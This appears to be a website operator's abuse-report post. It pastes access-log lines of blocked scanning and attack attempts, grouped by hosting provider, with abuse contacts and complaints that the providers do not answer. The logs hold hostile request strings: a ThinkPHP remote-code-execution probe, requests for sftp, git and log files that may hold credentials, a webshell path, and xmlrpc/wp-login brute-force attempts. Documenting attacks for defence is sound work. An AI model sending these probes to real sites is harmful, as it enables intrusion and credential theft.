160.153.246.243 website*x.com – – [16/Aug/2025:11:16:18 +0200] „HEAD /wp HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
160.153.246.243 website*x.com – – [16/Aug/2025:11:18:01 +0200] „HEAD /Wp HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
160.153.246.243 website*x.com – – [16/Aug/2025:11:19:39 +0200] „HEAD /WP HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
160.153.246.243 website*x.com – – [16/Aug/2025:11:21:13 +0200] „HEAD /old HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
160.153.246.243 website*x.com – – [16/Aug/2025:11:22:12 +0200] „HEAD /Old HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
160.153.246.243 website*x.com – – [16/Aug/2025:11:23:44 +0200] „HEAD /OLD HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
160.153.246.243 website*x.com – – [16/Aug/2025:11:25:48 +0200] „HEAD /oldsite HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
160.153.246.243 website*x.com – – [16/Aug/2025:11:26:50 +0200] „HEAD /new HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
160.153.246.243 website*x.com – – [16/Aug/2025:11:28:27 +0200] „HEAD /New HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
160.153.246.243 website*x.com – – [16/Aug/2025:11:30:35 +0200] „HEAD /NEW HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
160.153.246.243 website*x.com – – [16/Aug/2025:11:31:10 +0200] „HEAD /wp-old HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
160.153.246.243 website*x.com – – [16/Aug/2025:11:32:43 +0200] „HEAD /2022 HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
160.153.246.243 website*x.com – – [16/Aug/2025:11:35:08 +0200] „HEAD /2023 HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
160.153.246.243 website*x.com – – [16/Aug/2025:11:36:10 +0200] „HEAD /2024 HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
160.153.246.243 website*x.com – – [16/Aug/2025:11:37:50 +0200] „HEAD /2017 HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
160.153.246.243 website*x.com – – [16/Aug/2025:11:39:00 +0200] „HEAD /2020 HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
160.153.246.243 website*x.com – – [16/Aug/2025:11:40:07 +0200] „HEAD /2019 HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
160.153.246.243 website*x.com – – [16/Aug/2025:11:41:16 +0200] „HEAD /2018 HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
160.153.246.243 website*x.com – – [16/Aug/2025:11:43:05 +0200] „HEAD /backup HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
160.153.246.243 website*x.com – – [16/Aug/2025:11:44:49 +0200] „HEAD /test HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
160.153.246.243 website*x.com – – [16/Aug/2025:11:45:58 +0200] „HEAD /Test HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
160.153.246.243 website*x.com – – [16/Aug/2025:11:47:12 +0200] „HEAD /TEST HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36“
… and so on… and so on!!!

AS135450 – PT Berkah Solusi Teknologi Informasi – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@ptbsti.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
103.77.107.216 website*x.com – – [16/Aug/2025:21:45:30 +0200] „GET /sftp-config.json HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0“
103.77.107.216 website*x.com – – [16/Aug/2025:21:45:30 +0200] „GET /.vscode/sftp.json HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0“

MAIL NR. 9 TODAY – Hacking-attempts from weekend!

admin@frantech.ca

AS53667 – FranTech Solutions – AGAIN AND AGAIN EVERY DAY!!! – VERY IGNORANT AND UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
admin@frantech.ca – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
107.189.8.225 www.website*x.com – – [16/Aug/2025:10:40:49 +0200] „GET /wp-json/sure-triggers/v1/automation/action HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36“
107.189.8.225 www.website*x.com – – [16/Aug/2025:10:42:24 +0200] „GET / HTTP/1.0“ 403 – „http://www.google.com.hk“ „Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36“

MAIL NR. 10 TODAY – Hacking-attempts from weekend!

admin@serveroffer.lt,abuse@advinservers.com,report@abuseradar.com

AS206216 – Advin Services LLC – VERY IGNORANT AND UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@advinservers.com,report@abuseradar.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
45.8.22.95 www.website*x.de – – [17/Aug/2025:06:11:25 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.google.com/search?q=wordpress“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0“
45.8.22.95 www.website*x.de – – [17/Aug/2025:06:11:40 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://www.google.com/search?q=wordpress“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36“
45.8.22.95 www.website*x.de – – [17/Aug/2025:06:11:40 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“

MAIL NR. 11 TODAY – Hacking-attempts from weekend!

abuse@m247.ro, starlink-abuse@spacex.com,abuse@comcast.net

AS7922 – Comcast Cable Communications, LLC – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES! WE BLOCK ALSO IGNORANT ISP!
abuse@comcast.net – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
73.244.241.106 website*x.com – – [16/Aug/2025:12:34:37 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“

AS14593 – Space Exploration Technologies Corporation – IS NOW COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES! WE BLOCK ALSO IGNORANT ISP!
starlink-abuse@spacex.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
2a0d:3344:325a:cd08:7cb8:1497:3d1c:828c website*x.com – – [16/Aug/2025:12:39:15 +0200] „POST /xmlrpc.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Linux; Android 10; arm64) AppleWebKit/537.36 (KHTML, like Gecko) Firefox/80.0.0.0 Safari/537.36“

AS9009 – M247 Europe SRL – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@m247.ro – ALWAYS RESPONSED IN OUR ABUSE EMAILS!
188.241.176.222 www.website*x.com – – [16/Aug/2025:14:35:50 +0200] „GET /?s=../%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.2172.49 Safari/537.36“
188.241.176.222 www.website*x.com – – [16/Aug/2025:14:35:50 +0200] „GET /?s=../%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.287.71 Safari/537.36“
188.241.176.222 www.website*x.com – – [16/Aug/2025:14:35:51 +0200] „GET /?s=../%5Cthink%5CContainer/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.748.40 Safari/537.36“
188.241.176.222 www.website*x.com – – [16/Aug/2025:14:35:51 +0200] „GET /?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.522.113 Safari/537.36“
188.241.176.222 www.website*x.com – – [16/Aug/2025:14:35:51 +0200] „GET /?s=../%5Cthink%5CContainer/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.1294.81 Safari/537.36“
188.241.176.222 www.website*x.com – – [16/Aug/2025:14:35:51 +0200] „GET /?s=/index/%5Cthink%5CContainer/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.458.59 Safari/537.36“
188.241.176.222 www.website*x.com – – [16/Aug/2025:14:35:52 +0200] „GET /?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.1033.11 Safari/537.36“
188.241.176.222 www.website*x.com – – [16/Aug/2025:14:35:52 +0200] „GET /?s=/Home/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.787.102 Safari/537.36“
188.241.176.222 www.website*x.com – – [16/Aug/2025:14:35:53 +0200] „GET /?s=/index/%5Cthink%5CContainer/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.718.98 Safari/537.36“
188.241.176.222 www.website*x.com – – [16/Aug/2025:14:35:53 +0200] „GET /?s=/Home/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=md5&vars%5B1%5D%5B%5D=HelloThinkPHP HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.2855.134 Safari/537.36“

MAIL NR. 12 TODAY – Hacking-attempts from weekend!

abuse@microsoft.com, msftcs@microsoft.com, cert@microsoft.com,abuse@comcast.net,starlink-abuse@spacex.com

AS7922 – Comcast Cable Communications, LLC – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES! WE BLOCK ALSO IGNORANT ISP!
abuse@comcast.net – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
73.244.241.106 website*x.de – – [16/Aug/2025:12:32:46 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“

AS14593 – Space Exploration Technologies Corporation – IS NOW COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES! WE BLOCK ALSO IGNORANT ISP!
starlink-abuse@spacex.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
2a0d:3344:325a:cd08:7cb8:1497:3d1c:828c website*x.de – – [16/Aug/2025:12:37:31 +0200] „POST /xmlrpc.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.0.0 Safari/537.36“

MAIL NR. 13 TODAY – Hacking-attempts from weekend!

admin@serveroffer.lt,abuse@globaldata-cloud.com,abuse@nybula.com

AS42624 – Global-Data System IT Corporation – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@globaldata-cloud.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
212.11.64.161 website*x.com – – [16/Aug/2025:23:14:53 +0200] „GET /wp-admin/install.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15“
212.11.64.161 website*x.com – – [16/Aug/2025:23:15:04 +0200] „GET /wp-admin/install.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15“

AS401116 – Nybula LLC – VERY IGNORANT AND UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@nybula.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
196.251.118.216 website*x.com – – [16/Aug/2025:23:53:44 +0200] „GET //wp-content/plugins/fix/up.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36“

MAIL NR. 14 TODAY – Hacking-attempts from weekend!

abuse@microsoft.com, msftcs@microsoft.com, cert@microsoft.com,noc@perfectip.net

AS8075 – Microsoft Corporation – AGAIN AND AGAIN EVERY DAY!!! – VERY UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@microsoft.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT! ABUSE PER EMAIL IS STANDARD!!!
52.164.221.236 website*x.com – – [17/Aug/2025:04:57:23 +0200] „GET /Sanskrit.php HTTP/1.0“ 302 – „-“ „-“

AS22439 – Perfect International, Inc – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
noc@perfectip.net – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
74.81.35.179 website*x.com – – [17/Aug/2025:08:22:13 +0200] „GET /system/storage/logs/error.txt HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (compatible; Googlebot/2.1 +http://www.googlebot.com/bot.html)“
74.81.35.179 website*x.com – – [17/Aug/2025:08:22:13 +0200] „GET /system/logs/error.txt HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (compatible; Googlebot/2.1 +http://www.googlebot.com/bot.html)“
74.81.35.179 website*x.com – – [17/Aug/2025:08:22:13 +0200] „GET /storage/logs/error.txt HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (compatible; Googlebot/2.1 +http://www.googlebot.com/bot.html)“

MAIL NR. 15 TODAY – Hacking-attempts from weekend!

admin@serveroffer.lt

MAIL NR. 16 TODAY – Hacking-attempts from weekend!

bucklog@proton.me,contact@proton.me,abuse@nybula.com,abuse@microsoft.com, msftcs@microsoft.com, cert@microsoft.com

AS211590 – Bucklog SARL – VERY IGNORANT AND UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
bucklog@proton.me – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
185.177.72.24 website*x.com – – [17/Aug/2025:03:05:55 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)“

AS401116 – Nybula LLC – VERY IGNORANT AND UNSECURE!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@nybula.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
196.251.118.216 website*x.com – – [17/Aug/2025:05:05:46 +0200] „GET //wp-content/plugins/fix/up.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36“

MAIL NR. 17 TODAY – Hacking-attempts from weekend!

ipas@cnnic.cn,guixiaowei@huawei.com,liuliqun2@huawei.com,abuse@virginmedia.com,abuse@alibaba-inc.com

AS55990 – Huawei Cloud Service data center – VERY IGNORANT AND UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
ipas@cnnic.cn,guixiaowei@huawei.com,liuliqun2@huawei.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
113.45.227.187 www.website*x.com – – [17/Aug/2025:06:49:36 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5“
113.45.227.187 www.website*x.com – – [17/Aug/2025:06:49:37 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0“

AS5089 – Virgin Media Limited – NOW ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@virginmedia.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
86.31.161.97 www.website*x.com – – [17/Aug/2025:06:54:11 +0200] „POST /xmlrpc.php HTTP/1.0“ 302 20 „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“
86.31.161.97 www.website*x.com – – [17/Aug/2025:08:55:49 +0200] „POST /xmlrpc.php HTTP/1.0“ 302 20 „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0“

AS37963 – Hangzhou Alibaba Advertising Co.,Ltd. – VERY IGNORANT AND UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@alibaba-inc.com – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
182.92.110.55 www.website*x.com – – [17/Aug/2025:06:58:57 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36“
182.92.110.55 www.website*x.com – – [17/Aug/2025:06:58:58 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0“

MAIL NR. 18 TODAY – Hacking-attempts from weekend!

abuse@ipxo.com, abuse@contabo.de, noc@contabo.de, sascha.wintz@contabo.de,admin@gbn.pl,hm-changed@vnnic.vn,hainm@inet.vn,domain@inet.vn

AS51167 – Contabo GmbH – HERE WITH 2 IP´S! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@contabo.de – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
2a02:c207:3002:3886::1 www.website*x.com – – [17/Aug/2025:07:03:41 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67“
2a02:c207:3002:3886::1 www.website*x.com – – [17/Aug/2025:07:03:41 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36“
+
185.234.69.206 www.website*x.com – – [17/Aug/2025:09:54:32 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36“
185.234.69.206 www.website*x.com – – [17/Aug/2025:09:54:32 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0“

AS200602 – GBN.PL Sp. z o.o. – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
admin@gbn.pl – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
193.143.18.18 www.website*x.com – – [17/Aug/2025:07:13:16 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36“
193.143.18.18 www.website*x.com – – [17/Aug/2025:07:13:17 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36“

AS149068 – iNET software one member company limited – VERY IGNORANT AND UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
hm-changed@vnnic.vn,hainm@inet.vn,domain@inet.vn – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
103.72.99.238 www.website*x.com – – [17/Aug/2025:07:18:08 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36“
103.72.99.238 www.website*x.com – – [17/Aug/2025:07:18:09 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5“

MAIL NR. 19 TODAY – Hacking-attempts from weekend!

abuse@biaman.pl,abuse@namecheaphosting.com,abuse@timeweb.ru

AS8865 – MSK BIAMAN – IS NOW ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@biaman.pl
212.33.80.253 www.website*x.com – – [17/Aug/2025:07:23:01 +0200] „POST /xmlrpc.php HTTP/1.0“ 302 20 „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36“

AS22612 – Namecheap, Inc. – HERE WITH 2 IP´S! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@namecheaphosting.com
162.0.226.65 www.website*x.com – – [17/Aug/2025:07:27:47 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36“
162.0.226.65 www.website*x.com – – [17/Aug/2025:07:27:48 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36“
162.0.226.65 www.website*x.com – – [17/Aug/2025:08:41:16 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5“
162.0.226.65 www.website*x.com – – [17/Aug/2025:08:41:17 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1“
+
198.54.114.57 www.website*x.com – – [17/Aug/2025:11:05:37 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36“
198.54.114.57 www.website*x.com – – [17/Aug/2025:11:05:37 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“

AS9123 – JSC „TIMEWEB“ – VERY IGNORANT AND UNSECURE! – RUSSIA IS COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@timeweb.ru – NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! VERY IGNORANT!
2a03:6f00:4::696 www.website*x.com – – [17/Aug/2025:07:37:40 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62“
2a03:6f00:4::696 www.website*x.com – – [17/Aug/2025:07:37:40 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https://www.website*x.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1“

